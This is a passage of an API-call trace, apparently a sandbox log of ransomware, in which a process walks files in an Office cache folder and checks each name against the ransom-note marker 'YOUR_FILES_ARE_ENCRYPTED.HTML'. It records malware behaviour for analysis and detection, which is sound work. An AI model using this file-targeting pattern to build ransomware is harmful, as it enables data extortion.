cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\33F63883-F0AE-4AB6-B4F0-30BB1951B381") returned 157 [0111.362] PathFindExtensionW (pszPath="33F63883-F0AE-4AB6-B4F0-30BB1951B381") returned="" [0111.362] lstrlenW (lpString="") returned 0 [0111.362] PathFindExtensionW (pszPath="33F63883-F0AE-4AB6-B4F0-30BB1951B381") returned="" [0111.362] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82bdad10, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x82bdad10, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x82bdad10, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x8440, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="3628527B-53B7-45AD-A6DB-2BB7CCE4B284", cAlternateFileName="362852~1")) returned 1 [0111.362] StrStrIW (lpFirst="3628527B-53B7-45AD-A6DB-2BB7CCE4B284", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.362] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\3628527B-53B7-45AD-A6DB-2BB7CCE4B284") returned 157 [0111.362] PathFindExtensionW (pszPath="3628527B-53B7-45AD-A6DB-2BB7CCE4B284") returned="" [0111.363] lstrlenW (lpString="") returned 0 [0111.363] PathFindExtensionW (pszPath="3628527B-53B7-45AD-A6DB-2BB7CCE4B284") returned="" [0111.363] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab8e2fcd, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xab8e2fcd, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xab8e2fcd, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x4a91, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="393DA17C-492D-4E39-93B9-A0EB68F559AE", cAlternateFileName="393DA1~1")) returned 1 [0111.363] StrStrIW (lpFirst="393DA17C-492D-4E39-93B9-A0EB68F559AE", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.363] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\393DA17C-492D-4E39-93B9-A0EB68F559AE") returned 157 [0111.363] PathFindExtensionW (pszPath="393DA17C-492D-4E39-93B9-A0EB68F559AE") returned="" [0111.363] lstrlenW (lpString="") returned 0 [0111.363] PathFindExtensionW (pszPath="393DA17C-492D-4E39-93B9-A0EB68F559AE") returned="" [0111.363] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab9bff0e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xab9bff0e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xab9bff0e, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1a54, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="3AAE62FD-0B19-4925-93F8-8E1007B68014", cAlternateFileName="3AAE62~1")) returned 1 [0111.363] StrStrIW (lpFirst="3AAE62FD-0B19-4925-93F8-8E1007B68014", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.363] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\3AAE62FD-0B19-4925-93F8-8E1007B68014") returned 157 [0111.363] PathFindExtensionW (pszPath="3AAE62FD-0B19-4925-93F8-8E1007B68014") returned="" [0111.363] lstrlenW (lpString="") returned 0 [0111.363] PathFindExtensionW (pszPath="3AAE62FD-0B19-4925-93F8-8E1007B68014") returned="" [0111.363] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x829648ac, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x829648ac, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x829648ac, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x63f1, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="3BA4462F-9DE4-49DE-B3B4-C55DE0BC2436", cAlternateFileName="3BA446~1")) returned 1 [0111.363] StrStrIW (lpFirst="3BA4462F-9DE4-49DE-B3B4-C55DE0BC2436", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.363] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\3BA4462F-9DE4-49DE-B3B4-C55DE0BC2436") returned 157 [0111.363] PathFindExtensionW (pszPath="3BA4462F-9DE4-49DE-B3B4-C55DE0BC2436") returned="" [0111.363] lstrlenW (lpString="") returned 0 [0111.363] PathFindExtensionW (pszPath="3BA4462F-9DE4-49DE-B3B4-C55DE0BC2436") returned="" [0111.363] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82c74994, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x82c74994, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x82c770d1, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x235a, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="3C5BB25A-C5B4-4565-A1C7-47EA3C32B62B", cAlternateFileName="3C5BB2~1")) returned 1 [0111.363] StrStrIW (lpFirst="3C5BB25A-C5B4-4565-A1C7-47EA3C32B62B", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.363] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\3C5BB25A-C5B4-4565-A1C7-47EA3C32B62B") returned 157 [0111.363] PathFindExtensionW (pszPath="3C5BB25A-C5B4-4565-A1C7-47EA3C32B62B") returned="" [0111.363] lstrlenW (lpString="") returned 0 [0111.363] PathFindExtensionW (pszPath="3C5BB25A-C5B4-4565-A1C7-47EA3C32B62B") returned="" [0111.363] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaba3536d, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xaba3536d, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xaba3536d, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1a3b, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="3E543A2A-53F0-47F8-9F51-FF1B9D7890AD", cAlternateFileName="3E543A~1")) returned 1 [0111.363] StrStrIW (lpFirst="3E543A2A-53F0-47F8-9F51-FF1B9D7890AD", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.363] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\3E543A2A-53F0-47F8-9F51-FF1B9D7890AD") returned 157 [0111.363] PathFindExtensionW (pszPath="3E543A2A-53F0-47F8-9F51-FF1B9D7890AD") returned="" [0111.363] lstrlenW (lpString="") returned 0 [0111.363] PathFindExtensionW (pszPath="3E543A2A-53F0-47F8-9F51-FF1B9D7890AD") returned="" [0111.363] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab9ac6e4, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xab9ac6e4, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xab9aee22, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x2132, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="3EED3C5A-5D36-468C-92B5-6D747B87F81E", cAlternateFileName="3EED3C~1")) returned 1 [0111.363] StrStrIW (lpFirst="3EED3C5A-5D36-468C-92B5-6D747B87F81E", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.363] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\3EED3C5A-5D36-468C-92B5-6D747B87F81E") returned 157 [0111.363] PathFindExtensionW (pszPath="3EED3C5A-5D36-468C-92B5-6D747B87F81E") returned="" [0111.363] lstrlenW (lpString="") returned 0 [0111.364] PathFindExtensionW (pszPath="3EED3C5A-5D36-468C-92B5-6D747B87F81E") returned="" [0111.364] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d79e71, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x82d79e71, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x82d7b256, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x2aee, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="3FFAE199-5C90-4A06-AA16-96546E1FDFD1", cAlternateFileName="3FFAE1~1")) returned 1 [0111.364] StrStrIW (lpFirst="3FFAE199-5C90-4A06-AA16-96546E1FDFD1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.364] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\3FFAE199-5C90-4A06-AA16-96546E1FDFD1") returned 157 [0111.364] PathFindExtensionW (pszPath="3FFAE199-5C90-4A06-AA16-96546E1FDFD1") returned="" [0111.364] lstrlenW (lpString="") returned 0 [0111.364] PathFindExtensionW (pszPath="3FFAE199-5C90-4A06-AA16-96546E1FDFD1") returned="" [0111.364] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82960d16, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x82960d16, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x82962239, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x341b, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="406E18D5-EC82-4FCC-82A8-2D148D067E02", cAlternateFileName="406E18~1")) returned 1 [0111.364] StrStrIW (lpFirst="406E18D5-EC82-4FCC-82A8-2D148D067E02", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.364] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\406E18D5-EC82-4FCC-82A8-2D148D067E02") returned 157 [0111.364] PathFindExtensionW (pszPath="406E18D5-EC82-4FCC-82A8-2D148D067E02") returned="" [0111.364] lstrlenW (lpString="") returned 0 [0111.364] PathFindExtensionW (pszPath="406E18D5-EC82-4FCC-82A8-2D148D067E02") returned="" [0111.364] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x823d5352, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x823d5352, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x823d6594, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x401d, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="40D6433E-0ACD-4B88-87FA-53392A86BE19", cAlternateFileName="40D643~1")) returned 1 [0111.364] StrStrIW (lpFirst="40D6433E-0ACD-4B88-87FA-53392A86BE19", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.364] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\40D6433E-0ACD-4B88-87FA-53392A86BE19") returned 157 [0111.364] PathFindExtensionW (pszPath="40D6433E-0ACD-4B88-87FA-53392A86BE19") returned="" [0111.364] lstrlenW (lpString="") returned 0 [0111.364] PathFindExtensionW (pszPath="40D6433E-0ACD-4B88-87FA-53392A86BE19") returned="" [0111.364] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb498a367, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb498a367, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb498a367, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x812e, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="42E3824A-FF5B-4A3C-9567-D98FEABDD40C", cAlternateFileName="42E382~1")) returned 1 [0111.364] StrStrIW (lpFirst="42E3824A-FF5B-4A3C-9567-D98FEABDD40C", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.364] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\42E3824A-FF5B-4A3C-9567-D98FEABDD40C") returned 157 [0111.364] PathFindExtensionW (pszPath="42E3824A-FF5B-4A3C-9567-D98FEABDD40C") returned="" [0111.364] lstrlenW (lpString="") returned 0 [0111.364] PathFindExtensionW (pszPath="42E3824A-FF5B-4A3C-9567-D98FEABDD40C") returned="" [0111.364] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc84c0c6a, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xc84c0c6a, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xc84c20aa, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x97c, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="43F05AC3-1345-4232-9173-E5AEAF85BF98", cAlternateFileName="43F05A~1")) returned 1 [0111.364] StrStrIW (lpFirst="43F05AC3-1345-4232-9173-E5AEAF85BF98", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.364] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\43F05AC3-1345-4232-9173-E5AEAF85BF98") returned 157 [0111.364] PathFindExtensionW (pszPath="43F05AC3-1345-4232-9173-E5AEAF85BF98") returned="" [0111.364] lstrlenW (lpString="") returned 0 [0111.364] PathFindExtensionW (pszPath="43F05AC3-1345-4232-9173-E5AEAF85BF98") returned="" [0111.364] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab9f6f30, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xab9f6f30, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xab9f6f30, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x2084, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="46FABBBB-AA17-4F4B-B3DC-D57DA40D1814", cAlternateFileName="46FABB~1")) returned 1 [0111.364] StrStrIW (lpFirst="46FABBBB-AA17-4F4B-B3DC-D57DA40D1814", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.364] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\46FABBBB-AA17-4F4B-B3DC-D57DA40D1814") returned 157 [0111.365] PathFindExtensionW (pszPath="46FABBBB-AA17-4F4B-B3DC-D57DA40D1814") returned="" [0111.365] lstrlenW (lpString="") returned 0 [0111.365] PathFindExtensionW (pszPath="46FABBBB-AA17-4F4B-B3DC-D57DA40D1814") returned="" [0111.365] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x824b3547, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x824b3547, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x824b4875, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x2aee, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="498EE5F1-6E13-4858-8E9A-E3766CA4C2B2", cAlternateFileName="498EE5~1")) returned 1 [0111.365] StrStrIW (lpFirst="498EE5F1-6E13-4858-8E9A-E3766CA4C2B2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.365] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\498EE5F1-6E13-4858-8E9A-E3766CA4C2B2") returned 157 [0111.365] PathFindExtensionW (pszPath="498EE5F1-6E13-4858-8E9A-E3766CA4C2B2") returned="" [0111.365] lstrlenW (lpString="") returned 0 [0111.365] PathFindExtensionW (pszPath="498EE5F1-6E13-4858-8E9A-E3766CA4C2B2") returned="" [0111.365] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc847f2b8, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xc847f2b8, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xc847f2b8, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0xcec, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="4BCC7FD4-613C-4B15-9DBE-908105E4ED54", cAlternateFileName="4BCC7F~1")) returned 1 [0111.365] StrStrIW (lpFirst="4BCC7FD4-613C-4B15-9DBE-908105E4ED54", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.365] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\4BCC7FD4-613C-4B15-9DBE-908105E4ED54") returned 157 [0111.365] PathFindExtensionW (pszPath="4BCC7FD4-613C-4B15-9DBE-908105E4ED54") returned="" [0111.365] lstrlenW (lpString="") returned 0 [0111.365] PathFindExtensionW (pszPath="4BCC7FD4-613C-4B15-9DBE-908105E4ED54") returned="" [0111.365] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4e08aa8, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb4e08aa8, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb4e09e87, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1f40, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="4C3DAF0F-5CF4-4BD5-A479-A5679BE8F55E", cAlternateFileName="4C3DAF~1")) returned 1 [0111.365] StrStrIW (lpFirst="4C3DAF0F-5CF4-4BD5-A479-A5679BE8F55E", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.365] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\4C3DAF0F-5CF4-4BD5-A479-A5679BE8F55E") returned 157 [0111.365] PathFindExtensionW (pszPath="4C3DAF0F-5CF4-4BD5-A479-A5679BE8F55E") returned="" [0111.365] lstrlenW (lpString="") returned 0 [0111.365] PathFindExtensionW (pszPath="4C3DAF0F-5CF4-4BD5-A479-A5679BE8F55E") returned="" [0111.365] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x828dd133, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x828dd133, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x828dd133, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x4825, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="4CA2E262-1B83-48AB-BA5B-2A052BA6485B", cAlternateFileName="4CA2E2~1")) returned 1 [0111.365] StrStrIW (lpFirst="4CA2E262-1B83-48AB-BA5B-2A052BA6485B", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.365] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\4CA2E262-1B83-48AB-BA5B-2A052BA6485B") returned 157 [0111.365] PathFindExtensionW (pszPath="4CA2E262-1B83-48AB-BA5B-2A052BA6485B") returned="" [0111.365] lstrlenW (lpString="") returned 0 [0111.365] PathFindExtensionW (pszPath="4CA2E262-1B83-48AB-BA5B-2A052BA6485B") returned="" [0111.365] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb5074490, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb5074490, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb5074490, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x2171, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="4F183948-A9C6-492E-8CD3-78756D7F03CF", cAlternateFileName="4F1839~1")) returned 1 [0111.365] StrStrIW (lpFirst="4F183948-A9C6-492E-8CD3-78756D7F03CF", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.365] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\4F183948-A9C6-492E-8CD3-78756D7F03CF") returned 157 [0111.365] PathFindExtensionW (pszPath="4F183948-A9C6-492E-8CD3-78756D7F03CF") returned="" [0111.365] lstrlenW (lpString="") returned 0 [0111.365] PathFindExtensionW (pszPath="4F183948-A9C6-492E-8CD3-78756D7F03CF") returned="" [0111.365] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc84da778, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xc84da778, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xc84db9c3, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x438, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="4F9F0AEF-1D87-4F0C-910C-0ADC7E172289", cAlternateFileName="4F9F0A~1")) returned 1 [0111.365] StrStrIW (lpFirst="4F9F0AEF-1D87-4F0C-910C-0ADC7E172289", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.365] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\4F9F0AEF-1D87-4F0C-910C-0ADC7E172289") returned 157 [0111.366] PathFindExtensionW (pszPath="4F9F0AEF-1D87-4F0C-910C-0ADC7E172289") returned="" [0111.366] lstrlenW (lpString="") returned 0 [0111.366] PathFindExtensionW (pszPath="4F9F0AEF-1D87-4F0C-910C-0ADC7E172289") returned="" [0111.366] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4b06560, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb4b06560, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb4b07902, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x2c73, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="511B4AE9-CD73-4ED0-A899-602921314CEC", cAlternateFileName="511B4A~1")) returned 1 [0111.366] StrStrIW (lpFirst="511B4AE9-CD73-4ED0-A899-602921314CEC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.366] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\511B4AE9-CD73-4ED0-A899-602921314CEC") returned 157 [0111.366] PathFindExtensionW (pszPath="511B4AE9-CD73-4ED0-A899-602921314CEC") 